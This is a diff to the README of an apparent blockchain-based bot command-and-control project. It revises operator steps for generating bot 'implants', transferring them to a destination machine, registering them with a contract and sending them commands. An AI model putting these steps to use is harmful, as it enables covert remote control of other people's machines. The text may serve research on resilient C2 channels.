platdrag/UnblockableChains/README.md

 `python3 -i src/Server/ServerCommands.py .`

-* Available commands: generateNewClientInstance, allowInstance, removeInstance, addWork, fundTransfer
+* Available commands:
+-- generateNewClientInstance (clientConfTemplateFile, fundValue, clientNodeRpcPort) -- allowInstance (instanceAddress)
+-- removeInstance (instanceAddress)
+-- addWork (instanceAddress, command)
+-- fundTransfer (instanceAddress, fundValue)

 Generate a new bot client instance:

-`>>> sc.generateNewClientInstance(1000000000000000000,opj('conf','clientGen', 'ClientConf.TEMPLATE.yaml'), port=30304)`
+`>>> sc.generateNewClientInstance('conf/clientGen/ClientConf.TEMPLATE.yaml', 1000000000000000000, port=30304)`

 Note the generated wallet address.
-Implant will be placed under `./generated/<GeneratedWalletAddress>` Transfer the implant to destination machine and run it:
+Implant will be placed under `./generated/<GeneratedWalletAddress>` Transfer the implant generated directory to destination machine and run it:

 `export PYTHONPATH=./src && python3 -i ./src/Client/ClientCommands.py . ./conf/clientConf.yaml`

-Client will run its own node, contact the contract and register with it.
+Client will run its own node, sync in light mode, contact the contract and register with it.
 If successful, it will start a listener for incoming commands.

 Once client has registered, back on the server side use interactive shell to add work to the client: